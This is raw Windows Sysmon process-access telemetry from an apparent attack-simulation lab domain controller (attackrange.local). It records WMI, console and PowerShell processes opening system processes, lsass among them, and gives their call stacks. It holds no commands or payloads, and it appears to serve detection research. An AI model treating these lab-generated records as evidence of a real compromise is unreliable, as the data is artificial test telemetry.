22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.021{05ADC7E1-229F-6039-1600-00000000AD01}15407320C:\Windows\system32\svchost.exe{05ADC7E1-70F4-603D-8088-00000000AD01}6892C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.005{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F4-603D-8088-00000000AD01}6892C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.005{05ADC7E1-70F4-603D-8088-00000000AD01}68923348C:\Windows\system32\conhost.exe{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.990{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-70F4-603D-8088-00000000AD01}6892C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.990{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.990{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.990{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.990{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.990{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.990{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 10341000x80000000000000001698141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.990{05ADC7E1-229F-6039-1600-00000000AD01}15407320C:\Windows\system32\svchost.exe{05ADC7E1-70F5-603D-8A88-00000000AD01}7836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 